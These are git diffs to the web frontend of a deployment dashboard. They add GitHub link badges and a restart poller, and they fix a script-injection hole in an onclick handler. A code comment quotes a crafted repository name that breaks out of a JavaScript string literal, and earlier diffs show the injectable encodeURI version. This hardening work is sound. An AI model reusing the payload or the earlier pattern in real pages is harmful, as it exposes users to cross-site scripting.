+            const ghChip = (b.githubCommitSha && b.githubRepoFullName && /^[A-Za-z0-9._-]+\/[A-Za-z0-9._-]+$/.test(b.githubRepoFullName))
+              ? `<a class="branch-gh-badge" href="https://github.com/${b.githubRepoFullName.split('/').map(encodeURIComponent).join('/')}/commit/${encodeURIComponent(b.githubCommitSha)}" target="_blank" rel="noopener" onclick="event.stopPropagation()" title="来自 GitHub webhook · 点击查看 commit ${esc(b.githubCommitSha)}" style="display:inline-flex;align-items:center;gap:4px;padding:2px 7px;border-radius:10px;background:rgba(96,165,250,0.1);border:1px solid rgba(96,165,250,0.3);color:#60a5fa;font-size:10px;font-weight:600;text-decoration:none;font-family:var(--font-mono,monospace)"><svg width="10" height="10" viewBox="0 0 16 16" fill="currentColor"><path d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"/></svg>${esc(String(b.githubCommitSha).slice(0, 7))}</a>`
+              : '';
+            const pinChip = b.pinnedCommit
+              ? `<span class="pinned-commit-badge" onclick="event.stopPropagation(); checkoutCommit('${esc(b.id)}', '', true, '')" title="已固定到历史提交 ${esc(b.pinnedCommit)}，点击恢复最新"><svg width="10" height="10" viewBox="0 0 16 16" fill="currentColor" style="vertical-align:-1px"><path d="M4.456.734a1.75 1.75 0 012.826.504l.613 1.327a3.081 3.081 0 002.084 1.707l2.454.584c1.332.317 1.8 1.972.832 2.94L11.06 9.695a.75.75 0 01-.19.436l-4.552 4.552a.75.75 0 01-1.06-1.06l4.305-4.305L7.307 7.13A4.581 4.581 0 005.03 4.929L4.416 3.6A.25.25 0 004.01 3.49L2.606 4.893a.25.25 0 00.104.407l1.328.613a4.581 4.581 0 012.204 2.277l.248.538a.75.75 0 01-1.36.628l-.248-.538a3.081 3.081 0 00-1.483-1.532L2.07 6.773C.783 6.19.381 4.602 1.3 3.682L2.703 2.28A1.75 1.75 0 014.456.734z"/></svg> ${esc(b.pinnedCommit)}</span>`
+              : '';
+            const hasAnyChip = ghChip || pinChip || portBadgesHtml;
+            return hasAnyChip
+              ? `<div class="branch-card-chips">${ghChip}${portBadgesHtml || ''}${pinChip}</div>`
+              : '';
+          })()}
         </div>
         ${b.errorMessage && !deployLog ? (() => {
           // P4 Part 8 (MECE R4): rich inline failure preview.

--- a/cds/web/app.js
+++ b/cds/web/app.js
@@ -3628,6 +3628,12 @@ function renderBranches() {
           ${b.pinnedCommit ? `<div class="branch-card-row2">
             <span class="pinned-commit-badge" onclick="event.stopPropagation(); checkoutCommit('${esc(b.id)}', '', true, '')" title="已固定到历史提交 ${esc(b.pinnedCommit)}，点击恢复最新"><svg width="10" height="10" viewBox="0 0 16 16" fill="currentColor" style="vertical-align:-1px"><path d="M4.456.734a1.75 1.75 0 012.826.504l.613 1.327a3.081 3.081 0 002.084 1.707l2.454.584c1.332.317 1.8 1.972.832 2.94L11.06 9.695a.75.75 0 01-.19.436l-4.552 4.552a.75.75 0 01-1.06-1.06l4.305-4.305L7.307 7.13A4.581 4.581 0 005.03 4.929L4.416 3.6A.25.25 0 004.01 3.49L2.606 4.893a.25.25 0 00.104.407l1.328.613a4.581 4.581 0 012.204 2.277l.248.538a.75.75 0 01-1.36.628l-.248-.538a3.081 3.081 0 00-1.483-1.532L2.07 6.773C.783 6.19.381 4.602 1.3 3.682L2.703 2.28A1.75 1.75 0 014.456.734z"/></svg> ${esc(b.pinnedCommit)}</span>
           </div>` : ''}
+          ${b.githubCommitSha && b.githubRepoFullName ? `<div class="branch-card-row2">
+            <a class="branch-gh-badge" href="https://github.com/${esc(b.githubRepoFullName)}/commit/${esc(b.githubCommitSha)}" target="_blank" rel="noopener" onclick="event.stopPropagation()" title="来自 GitHub webhook — 点击查看 commit: ${esc(b.githubCommitSha)}" style="display:inline-flex;align-items:center;gap:5px;padding:2px 8px;border-radius:10px;background:rgba(96,165,250,0.1);border:1px solid rgba(96,165,250,0.3);color:#60a5fa;font-size:10px;font-weight:600;text-decoration:none;font-family:var(--font-mono,monospace)">
+              <svg width="10" height="10" viewBox="0 0 16 16" fill="currentColor"><path d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"/></svg>
+              from GitHub · ${esc(String(b.githubCommitSha).slice(0, 7))}
+            </a>
+          </div>` : ''}
           ${portBadgesHtml ? `<div class="branch-card-ports">${portBadgesHtml}</div>` : ''}
         </div>
         ${b.errorMessage && !deployLog ? (() => {

--- a/cds/web/project-list.html
+++ b/cds/web/project-list.html
@@ -655,6 +655,21 @@
       color: #34d399;
     }
     .cds-card-stats .cds-stat.cds-stat-running strong { color: #6ee7b7; }
+    /* GitHub link chip — blue accent so it stands out without looking
+       like a status. Hover deepens the color so the link affordance is
+       obvious even when the card itself is also a link. */
+    .cds-card-stats .cds-stat.cds-stat-github {
+      border-color: rgba(96,165,250,0.35);
+      background: rgba(96,165,250,0.08);
+      color: #60a5fa;
+      font-family: var(--font-mono, monospace);
+      transition: background 120ms ease, border-color 120ms ease;
+    }
+    .cds-card-stats .cds-stat.cds-stat-github:hover {
+      background: rgba(96,165,250,0.16);
+      border-color: rgba(96,165,250,0.55);
+    }
+    .cds-card-stats .cds-stat.cds-stat-github svg { opacity: 1; }
     .cds-card-stats .cds-stat.cds-stat-idle {
       color: var(--text-muted);
     }

--- a/cds/web/projects.js
+++ b/cds/web/projects.js
@@ -637,6 +637,26 @@ window.cdsDoLogout = cdsDoLogout;
     var lastLabel = project.lastDeployedAt
       ? '最近部署 ' + formatRelative(project.lastDeployedAt)
       : '尚未部署';
+    // GitHub link chip — same pill style as the other stats so the strip
+    // stays homogeneous. Links to github.com, stops click bubbling so it
+    // doesn't also navigate into the card.
+    var ghChip = '';
+    if (project.githubRepoFullName) {
+      var repo = project.githubRepoFullName;
+      var autoOff = project.githubAutoDeploy === false;
+      var ghTitle = autoOff
+        ? 'GitHub: ' + repo + ' (自动部署已关闭)'
+        : 'GitHub: ' + repo + ' (push 自动部署)';
+      ghChip =
+        '<a class="cds-stat cds-stat-github" href="https://github.com/' + escapeHtml(repo) + '"' +
+          ' target="_blank" rel="noopener" onclick="event.stopPropagation()"' +
+          ' title="' + escapeHtml(ghTitle) + '"' +
+          ' style="text-decoration:none' + (autoOff ? ';opacity:0.55' : '') + '">' +
+          '<svg viewBox="0 0 16 16" fill="currentColor" style="width:12px;height:12px"><path d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"/></svg>' +
+          escapeHtml(repo.split('/').slice(-1)[0] || repo) +
+          (autoOff ? ' <span style="opacity:0.7">(off)</span>' : '') +
+        '</a>';
+    }
     return [
       '<div class="cds-card-stats">',
       '  <span class="cds-stat" title="分支总数">',
@@ -659,6 +679,7 @@ window.cdsDoLogout = cdsDoLogout;
       '    </svg>',
       '    ' + escapeHtml(lastLabel),
       '  </span>',
+      ghChip,
       '</div>',
     ].join('');
   }
@@ -867,10 +888,11 @@ window.cdsDoLogout = cdsDoLogout;
       ((services && services.infra && services.infra.length) || 0);
     var envLabel = project.legacyFlag ? 'production' : 'production';
     var cloneBadge = renderCloneBadge(project);
-    // GitHub link badge — shown in the foot strip when the project is
-    // bound to a GitHub repo (new Check Runs integration). Links to the
-    // repo on github.com. When not linked, renders empty.
-    var githubBadge = renderGithubBadge(project);
+    // GitHub link: rendered INSIDE renderStatsStrip as a 4th chip
+    // (cds-stat-github) so the badge shares the same pill style as the
+    // other stats and doesn't need its own row. The standalone
+    // renderGithubBadge() helper below is kept for potential reuse but
+    // not called by the card template anymore.
     var cloneBtn = renderCloneButton(project);
     // Show the clone error inline under the service strip when the
     // last attempt failed AND we're not already using the full-size
@@ -896,13 +918,6 @@ window.cdsDoLogout = cdsDoLogout;
     // Wrap in a div so the delete button can sit OUTSIDE the <a> tag.
     // <button> inside <a> is invalid HTML — click events on the button
     // bubble to the <a> in some browsers and navigate instead of deleting.
-    // Dedicated row for the GitHub link badge — sits between the stats
-    // strip and the foot so it doesn't squeeze the env-dot / service-count
-    // layout on narrow cards. Renders only when the project is linked.
-    var githubRow = githubBadge
-      ? '<div class="cds-project-card-github-row" style="padding:0 18px 10px;display:flex">' + githubBadge + '</div>'
-      : '';
-
     return [
       '<div class="cds-project-card-wrapper" style="position:relative">',
       '  <a class="cds-project-card" href="', href, '">',
@@ -913,7 +928,6 @@ window.cdsDoLogout = cdsDoLogout;
       '    ', bodyHtml,
       errorBlock,
       '    ', statsStrip,
-      '    ', githubRow,
       '    <div class="cds-project-card-foot">',
       '      <span style="display:inline-flex;align-items:center;gap:10px">',
       '        <span class="cds-env-dot">', envLabel, '</span>',

--- a/cds/web/projects.js
+++ b/cds/web/projects.js
@@ -421,6 +421,35 @@ async function cdsOpenSelfUpdate() {
         break;
       }
     }
+    // Stream ended without an explicit `done` event — almost always
+    // because CDS's restart killed the SSE mid-flight. Show a "正在
+    // 重启" state and poll /healthz until CDS responds, then reload.
+    // Without this fallback the button stays "更新中…" forever.
+    if (!done) {
+      status.innerHTML = '<span style="color:var(--amber,#f59e0b)">⌛ CDS 正在重启，等待端口就绪…</span>';
+      goBtn.textContent = '等待重启';
+      var tries = 0;
+      var poll = function () {
+        tries++;
+        fetch('/healthz', { credentials: 'same-origin', cache: 'no-store' })
+          .then(function (r) { return r.ok ? r.json() : null; })
+          .then(function (h) {
+            if (h && h.ok) {
+              status.innerHTML = '<span style="color:var(--green)">✓ CDS 已重启,刷新页面...</span>';
+              setTimeout(function () { location.reload(); }, 600);
+            } else if (tries < 40) {
+              setTimeout(poll, 1500);
+            } else {
+              status.innerHTML = '<span style="color:var(--red)">✗ 重启超时,请手动刷新页面确认</span>';
+              goBtn.disabled = false;
+              forceBtn.disabled = false;
+              goBtn.textContent = '重试';
+            }
+          })
+          .catch(function () { if (tries < 40) setTimeout(poll, 1500); });
+      };
+      setTimeout(poll, 2000);
+    }
   }
 
   dlg.querySelector('#_plSuGo').onclick = () => runSelfSync('/api/self-update', '更新');

--- a/cds/web/projects.js
+++ b/cds/web/projects.js
@@ -674,11 +674,24 @@ window.cdsDoLogout = cdsDoLogout;
     var ghChip = '';
     if (project.githubRepoFullName) {
       var repo = project.githubRepoFullName;
+      // Strict GitHub repo name pattern: owner/repo where each side is
+      // [A-Za-z0-9._-]+. GitHub's actual rules are a bit more lenient
+      // but this covers every real repo and rejects anything containing
+      // shell/JS meta-characters. If a malicious state.json gets a
+      // crafted repoFullName (e.g. "owner/x'+alert(1)+'"), we refuse
+      // to render the chip rather than inject it into an onclick JS
+      // literal. Caught by Cursor Bugbot #450 round 5.
+      if (!/^[A-Za-z0-9._-]+\/[A-Za-z0-9._-]+$/.test(repo)) {
+        ghChip = '';
+      } else {
       var autoOff = project.githubAutoDeploy === false;
       var ghTitle = autoOff
         ? 'GitHub: ' + repo + ' (自动部署已关闭)'
         : 'GitHub: ' + repo + ' (push 自动部署)';
-      var ghUrl = 'https://github.com/' + encodeURI(repo);
+      // Build the URL with encodeURIComponent on each path segment —
+      // unlike encodeURI, encodeURIComponent encodes single quotes
+      // (`%27`), eliminating the onclick JS-string-literal injection.
+      var ghUrl = 'https://github.com/' + repo.split('/').map(encodeURIComponent).join('/');
       ghChip =
         '<span class="cds-stat cds-stat-github" role="link" tabindex="0"' +
           ' onclick="event.preventDefault();event.stopPropagation();window.open(\'' + escapeHtml(ghUrl).replace(/'/g, '&#39;') + '\',\'_blank\',\'noopener\')"' +
@@ -688,6 +701,7 @@ window.cdsDoLogout = cdsDoLogout;
           escapeHtml(repo.split('/').slice(-1)[0] || repo) +
           (autoOff ? ' <span style="opacity:0.7">(off)</span>' : '') +
         '</span>';
+      }
     }
     return [
       '<div class="cds-card-stats">',

--- a/cds/web/projects.js
+++ b/cds/web/projects.js
@@ -867,6 +867,13 @@ window.cdsDoLogout = cdsDoLogout;
     // Wrap in a div so the delete button can sit OUTSIDE the <a> tag.
     // <button> inside <a> is invalid HTML — click events on the button
     // bubble to the <a> in some browsers and navigate instead of deleting.
+    // Dedicated row for the GitHub link badge — sits between the stats
+    // strip and the foot so it doesn't squeeze the env-dot / service-count
+    // layout on narrow cards. Renders only when the project is linked.
+    var githubRow = githubBadge
+      ? '<div class="cds-project-card-github-row" style="padding:0 18px 10px;display:flex">' + githubBadge + '</div>'
+      : '';
+
     return [
       '<div class="cds-project-card-wrapper" style="position:relative">',
       '  <a class="cds-project-card" href="', href, '">',
@@ -877,11 +884,11 @@ window.cdsDoLogout = cdsDoLogout;
       '    ', bodyHtml,
       errorBlock,
       '    ', statsStrip,
+      '    ', githubRow,
       '    <div class="cds-project-card-foot">',
-      '      <span style="display:inline-flex;align-items:center;gap:10px;flex-wrap:wrap">',
+      '      <span style="display:inline-flex;align-items:center;gap:10px">',
       '        <span class="cds-env-dot">', envLabel, '</span>',
       '        <span class="cds-service-count"><strong>', totalServices, '</strong> service', totalServices === 1 ? '' : 's', '</span>',
-      githubBadge,
       cloneBtn ? '<span style="flex-shrink:0">' + cloneBtn + '</span>' : '',
       '      </span>',
       '      ', enterCta,

--- a/cds/web/projects.js
+++ b/cds/web/projects.js
@@ -701,6 +701,35 @@ window.cdsDoLogout = cdsDoLogout;
   //   cloning  — SSE in progress
   //   ready    — clone finished, usable for deploy
   //   error    — last clone attempt failed (hover → cloneError)
+  // GitHub link badge — shown on project cards when the project is
+  // bound to a GitHub repo via the new Check Runs integration. Links
+  // straight to github.com/<owner>/<repo> in a new tab. `onclick` is
+  // only on a nested <a>, but the parent is ALSO an <a> (the card
+  // href). Native behaviour: clicking the inner <a> navigates to its
+  // href without going through the outer one, so we don't need
+  // preventDefault.
+  function renderGithubBadge(project) {
+    if (!project.githubRepoFullName) return '';
+    var repo = project.githubRepoFullName;
+    var autoDeployOff = project.githubAutoDeploy === false;
+    var title = autoDeployOff
+      ? 'GitHub: ' + repo + ' (自动部署已关闭)'
+      : 'GitHub: ' + repo + ' (push 自动部署)';
+    return (
+      '<a href="https://github.com/' + escapeHtml(repo) + '" target="_blank" rel="noopener" ' +
+        'onclick="event.stopPropagation()" ' +
+        'title="' + escapeHtml(title) + '" ' +
+        'style="display:inline-flex;align-items:center;gap:5px;padding:2px 8px;border-radius:10px;' +
+               'background:rgba(96,165,250,0.1);border:1px solid rgba(96,165,250,0.3);' +
+               'color:' + (autoDeployOff ? 'var(--text-muted)' : '#60a5fa') + ';' +
+               'font-size:11px;font-weight:600;text-decoration:none;font-family:var(--font-mono,monospace)">' +
+        '<svg width="11" height="11" viewBox="0 0 16 16" fill="currentColor"><path d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"/></svg>' +
+        escapeHtml(repo.split('/').slice(-1)[0] || repo) +
+        (autoDeployOff ? ' <span style="opacity:0.6">(off)</span>' : '') +
+      '</a>'
+    );
+  }
+
   function renderCloneBadge(project) {
     if (project.legacyFlag) {
       return '<span class="cds-legacy-badge">Legacy</span>';
@@ -809,6 +838,10 @@ window.cdsDoLogout = cdsDoLogout;
       ((services && services.infra && services.infra.length) || 0);
     var envLabel = project.legacyFlag ? 'production' : 'production';
     var cloneBadge = renderCloneBadge(project);
+    // GitHub link badge — shown in the foot strip when the project is
+    // bound to a GitHub repo (new Check Runs integration). Links to the
+    // repo on github.com. When not linked, renders empty.
+    var githubBadge = renderGithubBadge(project);
     var cloneBtn = renderCloneButton(project);
     // Show the clone error inline under the service strip when the
     // last attempt failed AND we're not already using the full-size
@@ -845,9 +878,10 @@ window.cdsDoLogout = cdsDoLogout;
       errorBlock,
       '    ', statsStrip,
       '    <div class="cds-project-card-foot">',
-      '      <span style="display:inline-flex;align-items:center;gap:10px">',
+      '      <span style="display:inline-flex;align-items:center;gap:10px;flex-wrap:wrap">',
       '        <span class="cds-env-dot">', envLabel, '</span>',
       '        <span class="cds-service-count"><strong>', totalServices, '</strong> service', totalServices === 1 ? '' : 's', '</span>',
+      githubBadge,
       cloneBtn ? '<span style="flex-shrink:0">' + cloneBtn + '</span>' : '',
       '      </span>',
       '      ', enterCta,

--- a/cds/web/projects.js
+++ b/cds/web/projects.js
@@ -638,8 +638,10 @@ window.cdsDoLogout = cdsDoLogout;
       ? '最近部署 ' + formatRelative(project.lastDeployedAt)
       : '尚未部署';
     // GitHub link chip — same pill style as the other stats so the strip
-    // stays homogeneous. Links to github.com, stops click bubbling so it
-    // doesn't also navigate into the card.
+    // stays homogeneous. CANNOT use a nested <a> (the whole card is already
+    // an <a>; nested <a> is invalid HTML and browsers silently close the
+    // outer <a>, breaking the card layout — the chip renders as a huge
+    // circle). Use <span> + onclick that calls window.open.
     var ghChip = '';
     if (project.githubRepoFullName) {
       var repo = project.githubRepoFullName;
@@ -647,15 +649,16 @@ window.cdsDoLogout = cdsDoLogout;
       var ghTitle = autoOff
         ? 'GitHub: ' + repo + ' (自动部署已关闭)'
         : 'GitHub: ' + repo + ' (push 自动部署)';
+      var ghUrl = 'https://github.com/' + encodeURI(repo);
       ghChip =
-        '<a class="cds-stat cds-stat-github" href="https://github.com/' + escapeHtml(repo) + '"' +
-          ' target="_blank" rel="noopener" onclick="event.stopPropagation()"' +
+        '<span class="cds-stat cds-stat-github" role="link" tabindex="0"' +
+          ' onclick="event.preventDefault();event.stopPropagation();window.open(\'' + escapeHtml(ghUrl).replace(/'/g, '&#39;') + '\',\'_blank\',\'noopener\')"' +
           ' title="' + escapeHtml(ghTitle) + '"' +
-          ' style="text-decoration:none' + (autoOff ? ';opacity:0.55' : '') + '">' +
-          '<svg viewBox="0 0 16 16" fill="currentColor" style="width:12px;height:12px"><path d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"/></svg>' +
+          ' style="cursor:pointer' + (autoOff ? ';opacity:0.55' : '') + '">' +
+          '<svg viewBox="0 0 16 16" fill="currentColor" style="width:12px;height:12px;flex-shrink:0"><path d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"/></svg>' +
           escapeHtml(repo.split('/').slice(-1)[0] || repo) +
           (autoOff ? ' <span style="opacity:0.7">(off)</span>' : '') +
-        '</a>';
+        '</span>';
     }
     return [
       '<div class="cds-card-stats">',
@@ -751,35 +754,10 @@ window.cdsDoLogout = cdsDoLogout;
   //   cloning  — SSE in progress
   //   ready    — clone finished, usable for deploy
   //   error    — last clone attempt failed (hover → cloneError)
-  // GitHub link badge — shown on project cards when the project is
-  // bound to a GitHub repo via the new Check Runs integration. Links
-  // straight to github.com/<owner>/<repo> in a new tab. `onclick` is
-  // only on a nested <a>, but the parent is ALSO an <a> (the card
-  // href). Native behaviour: clicking the inner <a> navigates to its
-  // href without going through the outer one, so we don't need
-  // preventDefault.
-  function renderGithubBadge(project) {
-    if (!project.githubRepoFullName) return '';
-    var repo = project.githubRepoFullName;
-    var autoDeployOff = project.githubAutoDeploy === false;
-    var title = autoDeployOff
-      ? 'GitHub: ' + repo + ' (自动部署已关闭)'
-      : 'GitHub: ' + repo + ' (push 自动部署)';
-    return (
-      '<a href="https://github.com/' + escapeHtml(repo) + '" target="_blank" rel="noopener" ' +
-        'onclick="event.stopPropagation()" ' +
-        'title="' + escapeHtml(title) + '" ' +
-        'style="display:inline-flex;align-items:center;gap:5px;padding:2px 8px;border-radius:10px;' +
-               'background:rgba(96,165,250,0.1);border:1px solid rgba(96,165,250,0.3);' +
-               'color:' + (autoDeployOff ? 'var(--text-muted)' : '#60a5fa') + ';' +
-               'font-size:11px;font-weight:600;text-decoration:none;font-family:var(--font-mono,monospace)">' +
-        '<svg width="11" height="11" viewBox="0 0 16 16" fill="currentColor"><path d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"/></svg>' +
-        escapeHtml(repo.split('/').slice(-1)[0] || repo) +
-        (autoDeployOff ? ' <span style="opacity:0.6">(off)</span>' : '') +
-      '</a>'
-    );
-  }
-
+  //
+  // GitHub link badge for bound projects lives inside renderStatsStrip
+  // (cds-stat-github chip). The old standalone renderGithubBadge helper
+  // was removed after the strip-integrated version replaced it.
   function renderCloneBadge(project) {
     if (project.legacyFlag) {
       return '<span class="cds-legacy-badge">Legacy</span>';
@@ -889,10 +867,8 @@ window.cdsDoLogout = cdsDoLogout;
     var envLabel = project.legacyFlag ? 'production' : 'production';
     var cloneBadge = renderCloneBadge(project);
     // GitHub link: rendered INSIDE renderStatsStrip as a 4th chip
-    // (cds-stat-github) so the badge shares the same pill style as the
-    // other stats and doesn't need its own row. The standalone
-    // renderGithubBadge() helper below is kept for potential reuse but
-    // not called by the card template anymore.
+    // (cds-stat-github) so the badge shares the same pill style as
+    // the other stats and doesn't need its own row.
     var cloneBtn = renderCloneButton(project);
     // Show the clone error inline under the service strip when the
     // last attempt failed AND we're not already using the full-size

--- a/cds/web/projects.js
+++ b/cds/web/projects.js
@@ -253,6 +253,15 @@ async function cdsOpenSelfUpdate() {
   // 丢失了分支选择器。分支列表页的 openSelfUpdate 用 openConfigModal +
   // combobox helpers（只在 app.js 里），不能共享。这里用 vanilla DOM
   // 重实现一个小 modal：原生 <select> 列分支 + SSE 流式反馈。
+  //
+  // 本函数声明在文件顶层(IIFE 外),拿不到 IIFE 内的 escapeHtml,
+  // 所以这里自带一个本地实现避免 ReferenceError。
+  const escapeHtml = (s) => String(s == null ? '' : s)
+    .replace(/&/g, '&amp;')
+    .replace(/</g, '&lt;')
+    .replace(/>/g, '&gt;')
+    .replace(/"/g, '&quot;')
+    .replace(/'/g, '&#39;');
   let info;
   try {
     const r = await fetch('/api/self-branches', { credentials: 'same-origin' });
@@ -302,9 +311,12 @@ async function cdsOpenSelfUpdate() {
     '  <div id="_plSuProgress" style="display:none;margin-top:12px;border:1px solid var(--card-border);border-radius:6px;padding:10px;background:var(--bg-base);font-family:monospace;font-size:11px;max-height:240px;overflow-y:auto;line-height:1.55"></div>',
     '  <div id="_plSuStatus" style="margin-top:8px;font-size:12px;color:var(--text-muted);min-height:14px"></div>',
     '</div>',
-    '<div style="flex-shrink:0;padding:12px 18px;border-top:1px solid var(--card-border);display:flex;gap:8px;justify-content:flex-end">',
-    '  <button id="_plSuCancel" style="padding:7px 14px;border-radius:6px;border:1px solid var(--card-border);background:transparent;color:var(--text-primary);cursor:pointer;font-size:12px">取消</button>',
-    '  <button id="_plSuGo" style="padding:7px 14px;border-radius:6px;border:none;background:var(--accent,#10b981);color:#fff;cursor:pointer;font-size:12px;font-weight:600">拉取并重启</button>',
+    '<div style="flex-shrink:0;padding:12px 18px;border-top:1px solid var(--card-border);display:flex;gap:8px;justify-content:space-between;align-items:center;flex-wrap:wrap">',
+    '  <button id="_plSuForce" title="git fetch + reset --hard origin/<branch> + 清 dist 缓存 + restart. 用于 self-update 因本地分叉 merge 而丢远端改动时救急" style="padding:7px 12px;border-radius:6px;border:1px solid rgba(245,158,11,0.4);background:transparent;color:var(--amber,#f59e0b);cursor:pointer;font-size:12px">💥 强制同步 (hard-reset)</button>',
+    '  <div style="display:flex;gap:8px">',
+    '    <button id="_plSuCancel" style="padding:7px 14px;border-radius:6px;border:1px solid var(--card-border);background:transparent;color:var(--text-primary);cursor:pointer;font-size:12px">取消</button>',
+    '    <button id="_plSuGo" style="padding:7px 14px;border-radius:6px;border:none;background:var(--accent,#10b981);color:#fff;cursor:pointer;font-size:12px;font-weight:600">拉取并重启</button>',
+    '  </div>',
     '</div>',
   ].join('');
 
@@ -317,20 +329,25 @@ async function cdsOpenSelfUpdate() {
   const esc = (ev) => { if (ev.key === 'Escape') { close(); document.removeEventListener('keydown', esc); } };
   document.addEventListener('keydown', esc);
 
-  dlg.querySelector('#_plSuGo').onclick = async () => {
+  // Shared SSE runner — both 拉取并重启 (self-update) and 强制同步
+  // (self-force-sync) stream the same {event, data:{step,status,title}}
+  // envelope. Extracted so the "Force" button reuses all the UI glue.
+  async function runSelfSync(endpoint, label) {
     const target = dlg.querySelector('#_plSuBranch').value;
     const progress = dlg.querySelector('#_plSuProgress');
     const status = dlg.querySelector('#_plSuStatus');
     const goBtn = dlg.querySelector('#_plSuGo');
+    const forceBtn = dlg.querySelector('#_plSuForce');
     goBtn.disabled = true;
-    goBtn.textContent = '更新中…';
+    forceBtn.disabled = true;
+    goBtn.textContent = label + '中…';
